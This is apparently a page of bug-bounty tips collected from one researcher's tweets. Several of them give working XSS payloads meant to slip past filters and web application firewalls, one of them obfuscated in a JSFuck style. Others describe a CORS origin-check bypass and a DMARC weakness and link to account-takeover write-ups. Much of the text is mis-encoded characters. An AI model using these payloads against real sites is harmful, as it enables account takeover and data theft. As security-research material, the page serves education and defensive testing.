Contents
Top 25 Vulnerability Parameters based on frequency
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) February 6, 2021
Vulnerable parameters including π¦π€ππΆ, π«π¦π¦, π¦π¦π₯π, π₯ππ, π«π¦π¦, π’π½π²π» π₯π²π±πΆπΏπ²π°π that can be used in automation tools or manual recon. π‘οΈπ§ββοΈhttps://t.co/D7j9jXfinM#bugbounty #bugbountytips #cybersecurity
a Javascript Polyglot for Cross-Site Scripting (XSS) π‘οΈ
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) January 25, 2021
<video src=">" onerror=setTimeout`confirm\x281\x29`>
-unicoded chars
-DOM window
-uncommon tags for filters
-various mimics#bugbounty #bugbountytips #cybersecurity pic.twitter.com/d7mOadnFRq
Account Takeover via Web Cache Poisoning based Reflected XSS
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) December 27, 2020
I wrote a write-up about combining Web Cache Poisoning with rXSS vulnerability. In this way, the impact has been escalated. π§ββοΈhttps://t.co/19UaCTiPqo#bugbounty #bugbountytips #cybersecurity
If you are curious about the working structure of this payload, you can find out with this tool. (thanks to @aemkei)https://t.co/RCvxWOiuoT pic.twitter.com/Hqa0myKfmQ
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) December 14, 2020
an XSS payload, Cuneiform-alphabet based
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) December 14, 2020
π='',πΊ=!π+π,π=!πΊ+π,πΊ=π+{},π=πΊ[π++],
π=πΊ[π«=π],π=++π«+π,πΉ=πΊ[π«+π],πΊ[πΉ+=πΊ[π]
+(πΊ.π+πΊ)[π]+π[π]+π+π+πΊ[π«]+πΉ+π+πΊ[π]
+π][πΉ](π[π]+π[π«]+πΊ[π]+π+π+"(π)")()#bugbounty #bugbountytips #cybersecurity pic.twitter.com/dYFmWlEAR8
a Python Snippet to try Race Condition weakness in Turbo Intruder
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) October 27, 2020
Source: https://t.co/bdf5EKQGqE#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity pic.twitter.com/VpuKF7DlQt
an XSS payload generated using JSfuck, for bypass attribute filters
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) October 23, 2020
Source: https://t.co/8W2jok2ZvM#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/hOORASpbcZ
an XSS payload to bypass some waf & filters in Firefox
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) October 4, 2020
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking pic.twitter.com/YwxpP715Rq
I wrote a write-up about Clickjacking vulnerability. This vulnerability causes Account Takeover weakness. π§ββοΈπͺhttps://t.co/tkf72QfHop#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec #bugbountytip
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) September 27, 2020
I wrote a write-up about content spoofing vulnerability I found. This vulnerability could lead to users being manipulated. I know that this vulnerability is simply and very low impact. :) https://t.co/oLMVSyWbKW#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) August 11, 2020
Informations after a simple Github research..
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) July 27, 2020
Github is really like a black hole π§ββοΈ#bugbounty #bugbountytips #cybersecurity #infosec pic.twitter.com/z9cX4FQE5p
π Due to DMARC Functions, sp Parameter Weakness π
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) July 20, 2020
If the value of the sp parameter is "none", weakness occurs even if the value of p is not "none".
[email protected] --> Not Vulnerable
[email protected] --> Vulnerable#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/4PJIwobMpj
π How can you make a Javascript Polyglot for XSS? π#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked pic.twitter.com/qmd3qUpQ2g
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) July 17, 2020
I was included in the Hall of Fame (1st quarter) by Mozilla!π₯³https://t.co/IpMxI18LCm#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) July 12, 2020
I writed a write-up about CORS vulnerability. This vulnerability causes both Account Takeover and Sensitive Data Leakage weakness. π‘οΈπ§ββοΈhttps://t.co/zaoorAh1cD#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) July 4, 2020
π‘οΈ CORS Protection Bypass π‘οΈ
— LΓΌtfΓΌ Mert Ceylan (@lutfumertceylan) July 1, 2020
If the system only allows "Origin: https://t.co/YB5OiaWlDW",
Use a gTLD containing "com" -> Origin: https://t.co/S0FQ43tWro#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking